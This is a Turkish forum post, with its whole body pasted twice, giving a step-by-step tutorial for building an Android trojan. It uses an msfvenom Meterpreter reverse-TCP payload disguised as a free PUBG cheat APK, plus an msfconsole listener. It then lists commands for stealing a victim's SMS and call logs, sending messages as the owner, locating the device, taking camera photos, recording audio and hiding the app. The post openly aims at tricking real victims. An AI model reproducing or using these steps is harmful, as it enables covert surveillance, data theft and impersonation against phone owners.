MERHABA ARKADAŞLAR BUGÜNKİ KONUMUZ ANDROİD TELEFONLAR İÇİN TROJAN,BACKDOOR OLUŞTURMAYI GÖSTERECEĞİM
İlk öncelikle payload oluşturmak için bir takım toollar kullanıcaz ben msfvenom kullanıcam siz neyi tercih edersiniz orası zevk meselesi herneyse başlayalım
Payload oluşturma kodumuz : msfvenom -p android/meterpreter/reverse_tcp LHOST=ip adresimiz LPORT=portumuz R > trojan.apk ben trojan yazdım zararlı yazılımın ismini siz belirleyin mesela nasıl bir kullanıcıya saldırmak isterseniz pupg oynayan birisi için bedavaucehilesi2023.apk yapabilirsiniz
Payloadumuzu oluşturduk şimdi ise dinlemeye almamız gerekli bunun içinde ben msfconsole tool'unu kullanıcam
Msfconsole kodlarımız :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost YOUR-IP (ip adresimiz)
set lport PORT (portumuz)
daha sonra ister run ister exploit diyerek trojanimizi dinlemeye alıyoruz daha sonra trojanı karşı kişiye yedirmek size kalıyor sayın imhatimi üyeleri
hedef kurban zararlı yazılımı açtıktan sonra cihazın içinde olacağız ve help komutu ile yapabileceğimiz şeyleri görebiliriz aslında birnevi telefonun ikinci sahibi oluyoruz
telefonun içerisine girdikten sonra bazı güzel komutları paylaşıp konuyu sonlandıracağım
check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.
ve bir komut daha vardı şuan hatırlamıyorum sonu icon ile bitiyordu onu kullanarak trojanı karşı cihaz yükleyince trojanı telefonda gizleyebiliyoruz
konu tamamen bana aittir beğeni yorum yaparsanız sevinirim iyi günler dilerim
İlk öncelikle payload oluşturmak için bir takım toollar kullanıcaz ben msfvenom kullanıcam siz neyi tercih edersiniz orası zevk meselesi herneyse başlayalım
Payload oluşturma kodumuz : msfvenom -p android/meterpreter/reverse_tcp LHOST=ip adresimiz LPORT=portumuz R > trojan.apk ben trojan yazdım zararlı yazılımın ismini siz belirleyin mesela nasıl bir kullanıcıya saldırmak isterseniz pupg oynayan birisi için bedavaucehilesi2023.apk yapabilirsiniz
Payloadumuzu oluşturduk şimdi ise dinlemeye almamız gerekli bunun içinde ben msfconsole tool'unu kullanıcam
Msfconsole kodlarımız :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost YOUR-IP (ip adresimiz)
set lport PORT (portumuz)
daha sonra ister run ister exploit diyerek trojanimizi dinlemeye alıyoruz daha sonra trojanı karşı kişiye yedirmek size kalıyor sayın imhatimi üyeleri
hedef kurban zararlı yazılımı açtıktan sonra cihazın içinde olacağız ve help komutu ile yapabileceğimiz şeyleri görebiliriz aslında birnevi telefonun ikinci sahibi oluyoruz
telefonun içerisine girdikten sonra bazı güzel komutları paylaşıp konuyu sonlandıracağım
check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.
ve bir komut daha vardı şuan hatırlamıyorum sonu icon ile bitiyordu onu kullanarak trojanı karşı cihaz yükleyince trojanı telefonda gizleyebiliyoruz
konu tamamen bana aittir beğeni yorum yaparsanız sevinirim iyi günler dilerim
Bu içeriği görmek için giriş yapın.